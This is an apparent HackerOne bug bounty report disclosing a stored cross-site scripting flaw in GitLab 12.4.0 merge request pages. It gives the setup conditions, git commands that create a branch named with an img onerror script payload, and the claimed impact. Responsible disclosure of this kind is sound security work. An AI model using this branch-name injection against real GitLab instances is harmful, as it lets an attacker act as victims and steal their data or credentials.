ESCALATED: Stored XSS in merge request pages
HackerOne report #723307 by mike12
on 2019-10-26, assigned to @ankelly:
Hello Gitlab!
To reproduce the bug, we need to open a merge request with the following conditions:
- Project must have 'Merge commit with semi-linear history' or 'Fast-forward merge' merge method
- The merge request must require rebase before fast-forward/merge
- A visitor of the merge request page must not have permissions to push to source branch
- Target branch name must have a special name
<img/src='x'/onerror=alert(document.domain)>
:)
Steps to reproduce:
-
Run Gitlab
docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
-
Create a new project
-
Go to the project settings and set the 'Merge method' to 'Fast-forward merge' or 'Merge commit with semi-linear history'
-
Clone the repository and run the following in the repository:
touch 1.txt git add 1.txt git commit -m "initial commit" git push origin master git checkout -b "<img/src='x'/onerror=alert(document.domain)>" touch 2.txt git add 2.txt git commit -m "add 2.txt" git push origin "<img/src='x'/onerror=alert(document.domain)>" git checkout master touch 3.txt git add 3.txt git commit -m "add 3.txt" git push origin master
-
Create a merge request
master
=><img/src='x'/onerror=alert(document.domain)>
-
Then we have to visit the merge request page under a user who does not have permissions to push to the source branch (in our case,
master
branch). For example:
- Make the project public and visit the merge request page under any user who does not have permissions in the project (or without authorization)
- Invite a user to the project, but without permissions to push to the source branch.
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.6.3p62
Gem Version: 2.7.9
Bundler Version:1.17.3
Rake Version: 12.3.3
Redis Version: 3.2.12
Git Version: 2.22.0
Sidekiq Version:5.2.7
Go Version: unknown
GitLab information
Version: 12.4.0
Revision: 1425a56c75b
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 10.9
URL: http://gitlab.example.com
HTTP Clone URL: http://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 10.2.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
root@gitlab:/#
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data
- Steal user's credentials
Attachments
Warning: Attachments received through HackerOne, please exercise caution!